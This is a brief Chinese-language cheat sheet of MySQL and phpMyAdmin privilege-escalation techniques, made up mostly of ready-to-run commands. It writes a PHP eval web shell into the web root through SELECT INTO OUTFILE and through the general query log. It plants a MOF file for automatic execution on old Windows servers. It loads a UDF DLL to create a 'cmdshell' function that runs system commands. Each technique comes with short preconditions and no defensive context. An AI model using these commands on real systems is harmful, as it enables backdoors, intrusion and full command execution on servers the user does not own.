0x01 phpnyadmin一句话提权
利用条件:
查询:SHOW VARIABLES LIKE “secure_file_priv”,为null
select'<?php @eval($_POST[td]);?>'INTO OUTFILE 'C:\\phpStudy\\PHPTutorial\\WWW\\door.php'
使用日志文件:
set global general_log = "ON";
SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/door.php';
select '<?php eval($_POST[td]);?>';
0x02 mof提权
利用条件
windows<=2003
可写入c:/windows/system32/mof目录 ,此文件会自动执行
select load_file('C:/wmpub/nullevt.mof') into dumpfile'c:/windows/system32/wbem/mof/nullevt.mof’
0x03 udf提权操作
利用条件
- 账号具有对Mysql的insert和delete权限
利用过程
获取相应权限后上传udf.php
访问udf.php进行连接(需要能够远程连接)
D:\xampp\mysql\lib\plugin\udf.dll
链接成功后导出DLL文件(注意目录)
mysql<5.0,导出路径随意;
5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32)
mysql>5.1,需要导出到mysql的插件目录
查看插件目录:show variables like ‘%plugin%’;创建自定义函数:Create Function cmdshell returns string soname ‘udf.dll’
已经存在:drop function cmdshell;
执行函数:select cmdshell(‘ipconfig’)
